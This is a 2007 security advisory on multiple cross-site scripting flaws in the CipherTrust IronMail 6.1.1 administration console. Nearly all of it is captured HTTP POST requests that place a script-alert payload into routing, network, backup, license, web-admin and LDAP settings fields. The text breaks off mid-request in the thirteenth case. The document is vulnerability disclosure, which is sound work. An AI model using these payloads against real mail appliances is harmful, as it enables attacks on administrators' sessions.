SIAADV-07-004-EN.txt

` ===============================  
- Advisory -  
===============================  
  
Título: Multipls XSS in Cypherstrust Ironmail 6.1.1  
Risk: Medium  
Date: 20.Feb.2007  
Author: Javier Olascoaga <jolascoaga *at* 514.es>   
WEB: http://www.514.es/  
  
  
.: [ INTRO ] :.  
  
IronMail protects enterprise email systems from inbound threats: spam, viruses;  
or hackers trying to take down or take over the e-mail system. IronMail protects  
enterprise email systems from outbound threats: regulatory compliance violations  
, corporate policy violations, or theft ("leakage") of confidential information   
or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet.   
  
.: [ TECHNICAL DESCRIPTION ] :.  
  
During the development of the technical tests against the IronMail mail system   
have been detected several Cross Site Scripting vulnerabilities in the   
administration console of the product.  
  
  
Next you can find the XSS founded:  
  
.: [ XSS #1 ] :.  
  
POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1  
Referer:  
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 295  
Cache-Control: no-cache  
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1;  
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;  
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;  
JSESSIONID=B227892A258E91419C09469E49AED4D4  
'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit  
  
  
.: [ XSS #2 ] :.  
  
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 343  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:11:46 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #3 ] :.  
  
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 341  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:12:26 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #4 ] :.  
  
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 337  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:12:31 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #5 ] :.  
  
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 337  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:12:36 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #6 ] :.  
  
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 338  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:12:41 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #7 ] :.  
  
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 340  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:12:48 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
  
.: [ XSS #8 ] :.  
  
POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 154  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:13:16 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #9 ] :.  
  
POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 146  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:13:41 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #10 ] :.  
  
POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 75  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=17;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1;  
menusToExpand=%2CConfigurationMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:20:28 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #11 ] :.  
  
POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 1225  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=15;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:21:27 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #12 ] :.  
  
POST  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 2840  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=11;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;  
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit  
HTTP/1.0 200 OK  
Date: Mon, 19 Feb 2007 10:22:51 GMT  
Server: Apache  
Pragma: no-cache  
Cache-Control: no-store  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
.: [ XSS #13 ] :.  
  
POST  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save  
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*  
Referer:  
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save  
Accept-Language: es-ES,en-us;q=0.5  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13  
Host: 172.0.0.2:10443  
Content-Length: 2840  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;  
tabbedMenuSelected=11;  
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;  
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;  
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;  
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E  
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D